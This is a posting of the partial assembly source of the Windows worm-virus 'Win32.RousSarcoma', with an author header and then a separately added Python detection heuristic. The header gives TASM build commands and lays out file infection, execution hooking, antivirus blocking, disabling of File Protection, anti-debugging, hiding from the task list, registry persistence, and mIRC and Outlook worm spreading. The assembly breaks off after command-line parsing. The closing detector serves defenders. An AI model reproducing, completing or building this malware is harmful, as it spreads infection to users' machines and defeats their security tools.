Source Email Worm.win32.Rous.A
Published by: etiennekraemer on May 25, 2009
Copyright:Attribution Non-commercial

RousSarc.asm
;
;
; .--------------------------------.
; |                                |
; | Win32.RousSarcoma by SnakeByte |
; | SnakeByte@kryptocrew.de        |
; | www.kryptocrew.de/snakebyte    |
; .________________________________.
;
;
; This virus was created by the idea of coding a retro virus, which
; is able to fool with some AV's. I was not able to realize all my ideas,
; but I think it is some fun. This virus uses some tricks to make disinfection
; harder. I came to the idea of making a virus which is able to drop itself to
; the original EXE File, when I saw that most AV's do not detect the first
; generation of a lot of viruses. Therefore the one part of this virus stays
; undetected by heuristics. Generally this virus consists of 2 parts. The EXE File
; Part and the one which is executed with an infected file. It "hooks" the execution
; of every EXE File and does not execute it if it is an AV. If it is none, it gets
; infected and started. Before starting the file it also checks if there is a
; mirc.ini in the same path. If there is one, it drops a mIRC script worm. In addition
; to this, the virus installs itself in the registry to get started every time with
; Windows. It searches the registry for more paths to infect files there. If it can't find more
; paths it drops a VBS script to send the worm around via Outlook.
;
; I am not good at writing so here is an overview of what
; the virus does :
;
;
; Name             : Win32.RousSarcoma
; Type             : PE-Appender by increasing last section
; Worming          : Yes, mIRC Script and VBS Worm
; Operating System : Win32
; Author           : SnakeByte
; Payload          : None, too boring to write one ;) [ Got some other interesting stuff
;                    in mind I want to code as soon as possible ]
; Virus Size       : 8192 Bytes
; Infection Mark   : A-AV
; Encryption       : None
; Autostart        : RunOnce & exefiles
; Anti-Bait        : Does not infect files < 20000 Bytes
; Anti-Debugging   : Yes, against SoftIce and Int 1h tracing
; Anti-AV          : Yes, does not allow the execution of several AV's,
;                    disables Win2k File Protection
; Anti-User        : Hides itself in files & several different places,
;                    is not shown at ctrl-alt-del list
; Runs at Level    : Ring-3, but still infects every EXE File on executing
; Infects          : 10 Files in the current directory,
;                    10 Files in every path stored in this registry Key :
;                    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths
;                    Every EXE File which gets executed
;
; How to compile ( TASM 5.0 ) :
;
;   tasm32 /z /ml /m3 RousSarc,,
;   tlink32 -Tpe -c RousSarc,RousSarc,, import32.lib
;   pewrsec RousSarc.EXE
;
;   ( Make sure that the .EXE is uppercase !! )
;
; At the moment there are just 100 Bytes of Code I could add, with the file staying
; at 8192 Bytes. If I added more, the file would grow to 12 KB. I decided to
; keep it small and leave stuff out like encryption or even poly. Maybe it could
; be optimized on several parts to make it fit with encryption to an 8 KB file,
; but I don't mind at the moment
;
;
;
; Thanks and greetz to :
;
;   Lord Arz    : Did you also finish your EXEFILES "hooking" something ? ;)
;   DukeCS      : Heh, when will KC be done ? *fg*
;   Matsad      : Sorry for not coming, but I got no cash and need to see my girlfriend :P
;   Lethal Mind : Heh, where are you ? ;(
;   Ciatrix     : Nice that you carry on !
;
;
;
; ***************************************************************************
; ------------------------[ Let's get ready to rumble ]----------------------
; ***************************************************************************

.586p
.model flat
jumps                                   ; calculate Jumps
.radix 16                               ; Hexadecimal numbers

; define some API's
extrn ExitProcess:PROC                  ; Host for EXE-Part
extrn LoadLibraryA:PROC                 ; necessary to get all other API's in the EXE-Part
extrn GetProcAddress:PROC               ; cause I don't want DLL not found errors
extrn MessageBoxA:PROC                  ; for testing

.code

; Some constants
VirusSize       equ 8192d               ; Length of EXE-File
ImageBase       equ 400000h             ; Imagebase of our TASM generated EXE-File
CPart1          equ 600h
Gap1            equ 0A00h

; ###########################################################################
; -------------------[ This is the first part of the virus ]-----------------
; ###########################################################################

Virus:
        ; Here do we search for EXE-files and put the
        ; entire PE-Virus EXE to the end !
        ; we search for the needed api's with GetProcAddress
        ; and LoadModuleHandle, so we will not get Problems
        ; with missing DLL's or API's

        mov     ebp, 'VA-A'             ; place a mark in ebp, to identify this part

        lea     eax, KERNEL32           ; push name of kernel32.dll
        push    eax
        call    LoadLibraryA
        mov     dword ptr [K32Handle], eax      ; save Handle
        test    eax, eax                ; if we failed we stop here
        jz      FirstGenHost

        lea     esi, Kernel32Names      ; get all API's we need from kernel
        lea     edi, XFindFirstFileA
        mov     ebx, K32Handle
        push    NumberOfKernel32APIS
        pop     ecx
        call    GetAPI3                 ; the procedure is needed in both parts

        lea     eax, advname            ; push name of advapi32.dll
        push    eax
        call    LoadLibraryA
        mov     dword ptr [ADVHandle], eax      ; save Handle
        test    eax, eax                ; if we failed we stop here
        jz      FirstGenHost

        lea     esi, AdvapiNames        ; get all API's we need from advapi32
        lea     edi, XRegOpenKeyExA
        mov     ebx, ADVHandle
        push    NumberOfAdvapiAPIS
        pop     ecx
        call    GetAPI3                 ; the procedure is needed in both parts

        ; Lets hide our Application from the CTRL-ALT-DEL List,
        ; to prevent us from being detected by a suspicious user ;)

        ; Check if the API is available
        cmp     dword ptr [XRegisterServiceProcess], 0
        je      NoHide

        ; Get ID of our process
        call    dword ptr [XGetCurrentProcessId]
        push    1                       ; We want to run as a service
        push    eax                     ; process id
        call    dword ptr [XRegisterServiceProcess]

NoHide:

; ***************************************************************************
; ---------------------------[ Initialisation ]------------------------------
; ***************************************************************************

        ; Lets do a check on our commandline params,
        ; to see, if we got started with a filename
        ; in it --> exefile method
        call    dword ptr [XGetCommandLineA]
        mov     dword ptr [CmdLine], eax

        ; the start of the commandline is in eax,
        ; we will parse it to the .exe part to see
        ; if there is anything afterwards
CommandReceive1:
        cmp     dword ptr [eax], 'EXE.'
        je      CommandOK1
        inc     eax
        jmp     CommandReceive1

CommandOK1:
        add     eax, 4h                 ; eax points directly after the <name>.exe
        cmp     byte ptr [eax], 0       ; if the Commandline ends here, we do not need
        je      SetRunOnceKey           ; to care about this ;)
        add     eax, 2h                 ; skip blank and "
        mov     esi, eax                ; save it
        mov     dword ptr [SaveBlanc], esi
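Defender-side, as an added example that is not part of SnakeByte's source: a Python heuristic for the appender layout the header describes (entry point inside an enlarged last section, infection mark "A-AV"). It assumes the entry point is redirected into the last section and that the mark is written into the appended data, neither of which the header states explicitly; build_pe constructs a synthetic PE32 fixture so the check runs offline.

```python
import struct

INFECTION_MARK = b"A-AV"  # infection mark named in the header above

def pe_sections(data):
    # Minimal PE32 parse: entry-point RVA plus (name, vaddr, vsize, rawptr, rawsize) per section.
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    _, nsec, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    secs = []
    for i in range(nsec):
        off = opt + opt_size + 40 * i
        vsize, vaddr, rawsize, rawptr = struct.unpack_from("<IIII", data, off + 8)
        secs.append((data[off:off + 8].rstrip(b"\0"), vaddr, vsize, rawptr, rawsize))
    return entry, secs

def appender_indicators(data):
    # Heuristic hits for a "grow the last section" appender like the one described above.
    parsed = pe_sections(data)
    if not parsed or not parsed[1]:
        return []
    entry, secs = parsed
    _, vaddr, vsize, rawptr, rawsize = secs[-1]
    hits = []
    # Assumption: control reaches the appended body via an entry point moved into the last section.
    if vaddr <= entry < vaddr + max(vsize, rawsize):
        hits.append("entry point in last section")
    # Assumption: the mark is stored in the appended data, so search only that section.
    if INFECTION_MARK in data[rawptr:rawptr + rawsize]:
        hits.append("infection mark in last section")
    return hits

def build_pe(entry_rva, sections):
    # Constructed fixture (not a real binary): minimal PE32 from (name, vaddr, raw_bytes) tuples.
    raw_off = (0x40 + 4 + 20 + 0xE0 + 40 * len(sections) + 0x1FF) & ~0x1FF
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0xE0, 0x102)
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)            # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)       # AddressOfEntryPoint
    table, body = b"", b""
    for name, vaddr, raw in sections:
        table += name.ljust(8, b"\0") + struct.pack("<IIIIIIHHI", len(raw), vaddr, len(raw), raw_off + len(body), 0, 0, 0, 0, 0x60000020)
        body += raw
    return (dos + b"PE\0\0" + coff + bytes(opt) + table).ljust(raw_off, b"\0") + body
```

To triage a real file, pass `open(path, "rb").read()` to `appender_indicators`; two hits together are a reasonable reason to quarantine, one hit alone is only a lead.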